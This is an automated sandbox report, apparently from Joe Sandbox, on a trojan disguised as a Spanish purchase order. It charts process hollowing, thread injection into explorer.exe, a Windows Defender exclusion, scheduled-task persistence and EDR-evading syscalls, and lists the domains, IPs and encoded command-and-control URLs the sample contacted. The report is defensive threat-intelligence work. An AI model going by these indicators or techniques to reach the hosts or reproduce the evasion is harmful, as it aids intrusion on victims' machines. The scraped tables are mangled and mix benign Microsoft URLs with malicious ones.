          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467133 Sample: Orden de compra 0307AR24.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 63 www.mzhhxxff.xyz 2->63 65 www.a1b5v.xyz 2->65 67 14 other IPs or domains 2->67 87 Snort IDS alert for network traffic 2->87 89 Found malware configuration 2->89 91 Malicious sample detected (through community Yara rule) 2->91 95 14 other signatures 2->95 11 Orden de compra 0307AR24.exe 7 2->11         started        15 RggSaCWUvAyNK.exe 5 2->15         started        signatures3 93 Performs DNS queries to domains with low reputation 65->93 process4 file5 55 C:\Users\user\AppData\...\RggSaCWUvAyNK.exe, PE32 11->55 dropped 57 C:\...\RggSaCWUvAyNK.exe:Zone.Identifier, ASCII 11->57 dropped 59 C:\Users\user\AppData\Local\...\tmp362B.tmp, XML 11->59 dropped 61 C:\Users\...\Orden de compra 0307AR24.exe.log, ASCII 11->61 dropped 97 Writes to foreign memory regions 11->97 99 Allocates memory in foreign processes 11->99 101 Adds a directory exclusion to Windows Defender 11->101 17 RegSvcs.exe 11->17         started        20 powershell.exe 23 11->20         started        22 powershell.exe 23 11->22         started        24 schtasks.exe 1 11->24         started        103 Multi AV Scanner detection for dropped file 15->103 105 Machine Learning detection for dropped file 15->105 107 Injects a PE file into a foreign processes 15->107 26 RegSvcs.exe 15->26         started        28 schtasks.exe 15->28         started        signatures6 process7 signatures8 75 Modifies the context of a thread in another process (thread injection) 17->75 77 Maps a DLL or memory area into another process 17->77 79 Sample uses process hollowing technique 17->79 85 2 other signatures 17->85 30 explorer.exe 65 2 17->30 injected 81 Loading BitLocker PowerShell Module 20->81 34 conhost.exe 20->34         started        36 WmiPrvSE.exe 20->36         started        38 conhost.exe 22->38         started        40 conhost.exe 24->40         started        83 Found direct / indirect Syscall (likely to bypass EDR) 26->83 42 conhost.exe 28->42         started        process9 dnsIp10 69 www.ux-design-courses-17184.bond 185.53.179.92, 49724, 80 TEAMINTERNET-ASDE Germany 30->69 71 theopencomputeproject.net 15.197.142.173, 49734, 80 TANDEMUS United States 30->71 73 4 other IPs or domains 30->73 117 System process connects to network (likely due to code injection or exploit) 30->117 44 systray.exe 30->44         started        47 rundll32.exe 30->47         started        49 autoconv.exe 30->49         started        signatures11 process12 signatures13 109 Modifies the context of a thread in another process (thread injection) 44->109 111 Maps a DLL or memory area into another process 44->111 113 Tries to detect virtualization through RDTSC time measurements 44->113 115 Switches to a custom stack to bypass stack traces 44->115 51 cmd.exe 44->51         started        process14 process15 53 conhost.exe 51->53         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Orden de compra 0307AR24.exe26%ReversingLabsByteCode-MSIL.Trojan.Generic
          Orden de compra 0307AR24.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe26%ReversingLabsWin32.Trojan.Generic

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          https://android.notify.windows.com/iOS0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          http://www.equipoleiremnacional.comReferer:0%Avira URL Cloudsafe
          http://www.117myw.comReferer:0%Avira URL Cloudsafe
          http://www.tiantiying.com/md02/www.hecxion.xyz0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%Avira URL Cloudsafe
          https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF0%Avira URL Cloudsafe
          http://www.a1b5v.xyz0%Avira URL Cloudsafe
          http://www.z8ggd.comReferer:0%Avira URL Cloudsafe
          https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
          http://www.theopencomputeproject.net/md02/0%Avira URL Cloudsafe
          http://www.ux-design-courses-17184.bond/md02/0%Avira URL Cloudsafe
          http://www.mzhhxxff.xyz/md02/www.coloradoskinwellness.com0%Avira URL Cloudsafe
          http://www.ux-design-courses-17184.bond/md02/?TPXh=O2vdgLwRhMAgOHoS701s4xS4xJeZ/+uwNgHwz2yOIOwCqMZJzZYnLthi8nNL68HJ3+dRBVTqOQ==&nHLDZb=8p-HvnKhThQhTxm0%Avira URL Cloudsafe
          http://www.rnwaifu.xyzReferer:0%Avira URL Cloudsafe
          http://www.ux-design-courses-17184.bond/md02/www.mzhhxxff.xyz0%Avira URL Cloudsafe
          https://word.office.comM0%Avira URL Cloudsafe
          https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-0%Avira URL Cloudsafe
          http://www.webuyandsellpa.com0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri0%Avira URL Cloudsafe
          http://www.detroitreels.com/md02/0%Avira URL Cloudsafe
          http://www.webuyandsellpa.com/md02/0%Avira URL Cloudsafe
          http://www.detroitreels.com0%Avira URL Cloudsafe
          http://www.coloradoskinwellness.com/md02/0%Avira URL Cloudsafe
          http://www.theopencomputeproject.net/md02/?TPXh=TC5sRGY/d0WrdY74L9um5PW4cqP23O9TC/qUYRxTqxu6QMwh8ii9j/dDz35GSdofbeImGevgjQ==&nHLDZb=8p-HvnKhThQhTxm0%Avira URL Cloudsafe
          http://www.woby.xyzReferer:0%Avira URL Cloudsafe
          http://www.equipoleiremnacional.com/md02/www.detroitreels.com0%Avira URL Cloudsafe
          http://www.equipoleiremnacional.com0%Avira URL Cloudsafe
          http://www.webuyandsellpa.com/md02/www.woby.xyz0%Avira URL Cloudsafe
          http://www.mzhhxxff.xyz/md02/0%Avira URL Cloudsafe
          http://www.hecxion.xyzReferer:0%Avira URL Cloudsafe
          https://wns.windows.com/e0%Avira URL Cloudsafe
          http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
          http://www.coloradoskinwellness.com/md02/?TPXh=50vPMniPucPBFAoGypRNvn+9klri27h0dApk4meYCliplUm/ww094FdaSsyOnJ5jMG3DM+yUOg==&nHLDZb=8p-HvnKhThQhTxm0%Avira URL Cloudsafe
          http://www.rnwaifu.xyz0%Avira URL Cloudsafe
          http://www.family-lawyers-7009103.world0%Avira URL Cloudsafe
          https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-0%Avira URL Cloudsafe
          http://www.hecxion.xyz0%Avira URL Cloudsafe
          https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc0%Avira URL Cloudsafe
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%Avira URL Cloudsafe
          http://www.equipoleiremnacional.com/md02/0%Avira URL Cloudsafe
          http://www.family-lawyers-7009103.world/md02/www.upcyclecharms.com0%Avira URL Cloudsafe
          http://www.theopencomputeproject.netReferer:0%Avira URL Cloudsafe
          http://www.ux-design-courses-17184.bond0%Avira URL Cloudsafe
          http://www.coloradoskinwellness.com0%Avira URL Cloudsafe
          http://www.117myw.com/md02/www.webuyandsellpa.com0%Avira URL Cloudsafe
          http://www.upcyclecharms.com/md02/www.a1b5v.xyz0%Avira URL Cloudsafe
          http://www.upcyclecharms.com0%Avira URL Cloudsafe
          http://www.rnwaifu.xyz/md02/0%Avira URL Cloudsafe
          http://www.coloradoskinwellness.com/md02/www.tiantiying.com0%Avira URL Cloudsafe
          http://www.a1b5v.xyz/md02/www.117myw.com0%Avira URL Cloudsafe
          https://outlook.come0%Avira URL Cloudsafe
          http://www.upcyclecharms.comReferer:0%Avira URL Cloudsafe
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the0%Avira URL Cloudsafe
          http://www.tiantiying.comReferer:0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-0%Avira URL Cloudsafe
          https://api.msn.com/v1/news/Feed/Windows?0%Avira URL Cloudsafe
          http://www.hecxion.xyz/md02/0%Avira URL Cloudsafe
          http://www.woby.xyz0%Avira URL Cloudsafe
          https://api.msn.com/I0%Avira URL Cloudsafe
          http://www.family-lawyers-7009103.worldReferer:0%Avira URL Cloudsafe
          http://www.tiantiying.com0%Avira URL Cloudsafe
          http://www.theopencomputeproject.net/md02/www.z8ggd.com0%Avira URL Cloudsafe
          https://status.squarespace.com0%Avira URL Cloudsafe
          http://www.woby.xyz/md02/0%Avira URL Cloudsafe
          http://www.hecxion.xyz/md02/www.theopencomputeproject.net0%Avira URL Cloudsafe
          http://www.webuyandsellpa.comReferer:0%Avira URL Cloudsafe
          http://www.117myw.com/md02/0%Avira URL Cloudsafe
          http://www.tiantiying.com/md02/0%Avira URL Cloudsafe
          http://www.z8ggd.com0%Avira URL Cloudsafe
          http://www.a1b5v.xyzReferer:0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu0%Avira URL Cloudsafe
          http://www.woby.xyz/md02/www.rnwaifu.xyz0%Avira URL Cloudsafe
          http://www.upcyclecharms.com/md02/0%Avira URL Cloudsafe
          http://www.ux-design-courses-17184.bondReferer:0%Avira URL Cloudsafe
          http://www.z8ggd.com/md02/0%Avira URL Cloudsafe
          http://www.mzhhxxff.xyz0%Avira URL Cloudsafe
          http://www.mzhhxxff.xyzReferer:0%Avira URL Cloudsafe
          http://www.theopencomputeproject.net0%Avira URL Cloudsafe
          http://www.z8ggd.com/md02/www.equipoleiremnacional.com0%Avira URL Cloudsafe
          https://excel.office.com-0%Avira URL Cloudsafe
          http://www.coloradoskinwellness.comReferer:0%Avira URL Cloudsafe
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz0%Avira URL Cloudsafe
          http://www.117myw.com0%Avira URL Cloudsafe
          http://www.equipoleiremnacional.com/md02/?TPXh=Cq7+/Ky+K6vI68NpDrm1YJYa3GKRdZGNexOywzaDimkbuuqps0atd8BONpkLeDzS4/cRTt0qqA==&nHLDZb=8p-HvnKhThQhTxm0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark0%Avira URL Cloudsafe
          https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c0%Avira URL Cloudsafe
          https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation0%Avira URL Cloudsafe
          http://www.a1b5v.xyz/md02/0%Avira URL Cloudsafe
          https://powerpoint.office.comEMd0%Avira URL Cloudsafe
          http://www.family-lawyers-7009103.world/md02/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.tiantiying.com
          		203.196.8.7
          		truetrue
            		unknown
            www.ux-design-courses-17184.bond
            		185.53.179.92
            		truetrue
              		unknown
              theopencomputeproject.net
              		15.197.142.173
              		truetrue
                		unknown
                www.a1b5v.xyz
                		54.67.42.145
                		truetrue
                  		unknown
                  detroitreels.com
                  		3.33.130.190
                  		truetrue
                    		unknown
                    ext-sq.squarespace.com
                    		198.185.159.144
                    		truetrue
                      		unknown
                      ssl1.prod.systemdragon.com
                      		104.18.187.223
                      		truetrue
                        		unknown
                        equipoleiremnacional.com
                        		192.250.227.27
                        		truetrue
                          		unknown
                          www.mzhhxxff.xyz
                          		unknown
                          		unknowntrue
                            		unknown
                            www.upcyclecharms.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.coloradoskinwellness.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.detroitreels.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.equipoleiremnacional.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.z8ggd.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.theopencomputeproject.net
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.family-lawyers-7009103.world
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.ux-design-courses-17184.bond/md02/?TPXh=O2vdgLwRhMAgOHoS701s4xS4xJeZ/+uwNgHwz2yOIOwCqMZJzZYnLthi8nNL68HJ3+dRBVTqOQ==&nHLDZb=8p-HvnKhThQhTxmtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.theopencomputeproject.net/md02/?TPXh=TC5sRGY/d0WrdY74L9um5PW4cqP23O9TC/qUYRxTqxu6QMwh8ii9j/dDz35GSdofbeImGevgjQ==&nHLDZb=8p-HvnKhThQhTxmtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.coloradoskinwellness.com/md02/?TPXh=50vPMniPucPBFAoGypRNvn+9klri27h0dApk4meYCliplUm/ww094FdaSsyOnJ5jMG3DM+yUOg==&nHLDZb=8p-HvnKhThQhTxmtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.equipoleiremnacional.com/md02/?TPXh=Cq7+/Ky+K6vI68NpDrm1YJYa3GKRdZGNexOywzaDimkbuuqps0atd8BONpkLeDzS4/cRTt0qqA==&nHLDZb=8p-HvnKhThQhTxmtrue
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://www.117myw.comReferer:explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.mzhhxxff.xyz/md02/www.coloradoskinwellness.comexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.tiantiying.com/md02/www.hecxion.xyzexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.equipoleiremnacional.comReferer:explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.theopencomputeproject.net/md02/explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngFexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.a1b5v.xyzexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554376951.000000000973C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.ux-design-courses-17184.bond/md02/explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.z8ggd.comReferer:explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://word.office.comMexplorer.exe, 0000000A.00000000.2168253854.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4557583157.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ux-design-courses-17184.bond/md02/www.mzhhxxff.xyzexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.webuyandsellpa.comexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.rnwaifu.xyzReferer:explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.detroitreels.com/md02/explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.webuyandsellpa.com/md02/explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.detroitreels.comexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.coloradoskinwellness.com/md02/explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.webuyandsellpa.com/md02/www.woby.xyzexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.woby.xyzReferer:explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.equipoleiremnacional.comexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.equipoleiremnacional.com/md02/www.detroitreels.comexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.mzhhxxff.xyz/md02/explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://wns.windows.com/eexplorer.exe, 0000000A.00000002.4554886834.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3075767239.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2984822872.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOrden de compra 0307AR24.exe, 00000000.00000002.2164458182.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, RggSaCWUvAyNK.exe, 0000000B.00000002.2237101497.0000000002B43000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.hecxion.xyzReferer:explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000A.00000003.2979693708.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2985382481.000000000C401000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2168253854.000000000C3FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558403675.000000000C402000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2985244166.000000000C40E000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.family-lawyers-7009103.worldexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.rnwaifu.xyzexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.equipoleiremnacional.com/md02/explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.hecxion.xyzexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&ocexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
